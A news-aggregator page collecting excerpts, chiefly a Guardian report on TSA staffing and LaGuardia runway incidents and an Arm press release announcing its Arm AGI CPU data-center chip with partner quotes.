Adam Stahl, the acting TSA deputy administrator, told Fox News that ICE agents would be “conducting non-specialized security support — manning the exit lanes, crowd management, line control … to help alleviate the challenges that our officers are facing”.
Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work without pay amid the shutdown. The shutdown stems from the US Senate not funding the TSA’s parent agency over a disagreement over immigration enforcement reforms.
Sean Duffy, the US transportation secretary, on Monday declined to say how many controllers were on duty at LaGuardia when Sunday’s crash happened, deferring instead to the ongoing NTSB investigation.
But he denied rumors that the tower had only one controller on duty. He said LaGuardia was “very well staffed”, with 33 certified controllers and more in training. He said the goal was to have 37 on staff.
Sunday’s incident was not the only collision at LaGuardia in recent months. In October, two Delta jets collided on a taxiway, sending one person to a hospital.
In July 2024, a co-pilot reported a similar near-collision after controllers said a plane was cleared to cross the runway even though another aircraft was landing at the same time.
“Ground control issued a stop command just in time,” the report entry said.
...
Read the original on www.theguardian.com »
...
Read the original on www.githubstatus.com »
Today, Arm is announcing the Arm AGI CPU, a new class of production-ready silicon built on the Arm Neoverse platform and designed to power the next generation of AI infrastructure.
For the first time in our more than 35-year history, Arm is delivering its own silicon products — extending the Arm Neoverse platform beyond IP and Arm Compute Subsystems (CSS) to give customers greater choice in how they deploy Arm compute — from building custom silicon to integrating platform-level solutions or deploying Arm-designed processors. It reflects both the rapid evolution of AI infrastructure and growing demand from the ecosystem for production-ready Arm platforms that can be deployed at pace and scale.
AI systems are increasingly operating continuously at global scale. Historically, the human was the bottleneck in computing — the pace at which people could interact with systems defined how quickly work could move through them. In the era of agentic AI, that constraint disappears as software agents coordinate tasks, interact with multiple models and make decisions in real time.
As AI systems run continuously and workloads grow in complexity, the CPU becomes the pacing element of modern infrastructure — responsible for keeping distributed AI systems operating efficiently at scale. In a modern-day AI data center, the CPU manages thousands of distributed tasks — orchestrating accelerators, managing memory and storage, scheduling workloads and moving data across systems — and now, with agentic AI, coordinating fan-out across large numbers of agents.
This shift places new demands on the CPU and that requires an evolution of the processor.
Arm Neoverse already underpins many of today’s leading hyperscale and AI platforms, including AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI infrastructure scales globally, partners across the ecosystem are asking Arm to do more. The Arm AGI CPU was created to address this shift.
Agentic AI workloads demand sustained performance at massive scale. The Arm AGI CPU is designed to deliver high per-task performance at sustained load across thousands of cores in parallel — all within the power and cooling limits of modern data centers.
Every element of the Arm AGI CPU — from operating frequency to memory and I/O architecture — has been designed to support massively parallel, high-performance agentic workloads in a densely populated rack deployment.
Arm’s reference server configuration is a 1OU, 2-node design — packing in two chips with dedicated memory and I/O for a total of 272 cores per blade. These blades are designed to fully populate a standard air-cooled 36kW rack — 30 blades delivering a total of 8160 cores. Arm has additionally partnered with Supermicro on a liquid-cooled 200kW design capable of housing 336 Arm AGI CPUs for over 45,000 cores.
In this configuration, the Arm AGI CPU is capable of delivering more than 2x the performance per rack compared to the latest x86 systems*, achieved through the fundamental advantages of the Arm architecture and careful matching of system resources to compute:
* Arm AGI CPU’s class-leading memory bandwidth means more effective threads of execution per rack; x86 CPUs degrade as cores contend under sustained load.
* High performance, efficient, single-threaded Arm Neoverse V3 CPU cores outperform legacy architectures; every Arm thread does more work.
* More usable threads and more work-per-thread compounds to massive performance gains per rack.
The Arm AGI CPU is already seeing strong commercial momentum with partners at the forefront of scaling agentic AI infrastructure. Planned deployments span accelerator management, agentic orchestration and the densification of services, applications and tools needed for agentic task scale-out — as well as increased networking and data plane compute to support the AI data center.
Meta is our lead partner and customer, co-developing the Arm AGI CPU to optimize gigawatt-scale infrastructure for its Meta family of apps and to work alongside Meta’s own custom MTIA accelerators. Other launch partners include Cerebras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each working with Arm on the deployment of the Arm AGI CPU to accelerate AI-driven services across cloud, networking and enterprise environments. Commercial systems are now available for order from ASRockRack, Lenovo and Supermicro.
To accelerate adoption further, Arm is introducing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS standard form factor server. Arm plans to contribute this reference server design and supporting firmware, along with further contributions including system architecture specifications, debug frameworks and diagnostic and verification tooling applicable to all Arm-based systems. Further details will come at the upcoming OCP EMEA Summit.
The launch of Arm AGI CPU represents a new chapter in Arm’s data center journey and continued leadership in computing innovation. As AI reshapes the industry, Arm remains committed to enabling progress across the ecosystem — meeting customers where they are, from hyperscale cloud providers to AI startups.
The Arm AGI CPU is the first offering of Arm’s new data center silicon product line and is available to order now. Follow-on products are committed, targeting best-in-class performance, scale and efficiency. This continues in parallel with the Arm Neoverse CSS product roadmap so that all Arm data center customers move forward together on platform architecture and software compatibility.
Entering this new chapter, our mission remains unchanged: to provide the compute foundation that enables innovation across industries. And the ecosystem is fully behind us: More than 50 leading companies across hyperscale, cloud, silicon, memory, networking, software, system design and manufacturing are supporting the expansion of the Arm compute platform into silicon. With Arm AGI CPU, we are not only defining the architecture of the AI-native data center, we are building it.
Hear more from our Arm AGI CPU deployment partners:
“At Cerebras we build AI infrastructure designed for ultra-fast, large-scale inference, and as this becomes the dominant workload in AI, composable, high-performance systems matter more than ever — these systems need purpose-built AI acceleration alongside efficient, scalable CPUs orchestrating data movement, networking, and coordination at scale. Extending the Arm compute platform into AGI-class infrastructure is a positive step for the ecosystem and for customers deploying AI at global scale.” — Andrew Feldman, CEO, Cerebras
“To continue our mission of helping build a better Internet, Cloudflare needs infrastructure that scales efficiently across our global network. The Arm AGI CPU provides high-performance, energy-efficient compute designed for the next generation of workloads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare
“Delivering AI experiences at global scale demands a robust and adaptable portfolio of custom silicon solutions, purpose-built to accelerate AI workloads and optimize performance across Meta’s platforms. We worked alongside Arm to develop the Arm AGI CPU to deploy an efficient compute platform that significantly improves our data center performance density and supports a multi-generation roadmap for our evolving AI systems.” — Santosh Janardhan, Head of Infrastructure, Meta
“OpenAI runs AI systems at massive scale. Hundreds of millions use ChatGPT every day, businesses build on our API, and developers rely on tools like Codex. The Arm AGI CPU will play an important role in our infrastructure as we scale, strengthening the orchestration layer that coordinates large scale AI workloads and improving efficiency, performance, and bandwidth across the system.” — Sachin Katti, Head of Industrial Compute at OpenAI
“At Positron, we are focused on purpose-built inference accelerators that delivers breakthrough token generation efficiency using commodity memory. Arm has consistently delivered the industry’s most power-efficient compute platforms, which makes the Arm AGI CPU a natural foundation for next-generation AI infrastructure. By combining Positron’s inference acceleration technology with the energy-efficient Arm AGI CPU platform, we see a powerful opportunity to help data center operators deploy frontier AI models at scale with greater performance per watt and per dollar.” — Mitesh Agrawal, CEO, Positron AI
“High-performance AI systems require tight coordination between general-purpose compute and accelerator architectures. By combining the Arm AGI CPU with Rebellions’ NPUs in new high-density server configurations — we’re delivering a scalable, energy efficient platform that is optimized for AI inference workloads at scale.” — Marshall Choy, Chief Business Officer, Rebellions
“SAP’s successful deployment of SAP HANA on Arm-based AWS Graviton underscores the maturity and performance of the Arm ecosystem for enterprise workloads. The Arm AGI CPU extends that opportunity, providing scalable, efficient compute designed to support the next generation of AI-powered business solutions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP
“SK Telecom is expanding into large-scale, full-stack AI inference data center infrastructure, which includes Arm AGI CPU and Rebellions AI accelerator chip. By bringing together our sovereign A. X foundation model with inference-optimized AI servers, we are ready to deliver it to world while elevating our AIDC competitiveness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom
This blog post contains forward-looking statements regarding Arm’s product roadmap, future performance, planned contributions and partner deployments. These statements are based on current expectations and are subject to risks and uncertainties that could cause actual results to differ materially. For a discussion of factors that could affect Arm’s results, please refer to Arm’s filings with the U. S. Securities and Exchange Commission.
Performance claims are based on Arm internal estimates comparing a fully populated rack of Arm AGI CPU-based servers against comparable x86-based server configurations using industry-standard workloads. Actual results may vary based on system configuration, workload, and other factors.
All product and company names are trademarks or registered trademarks of their respective holders.
...
Read the original on newsroom.arm.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.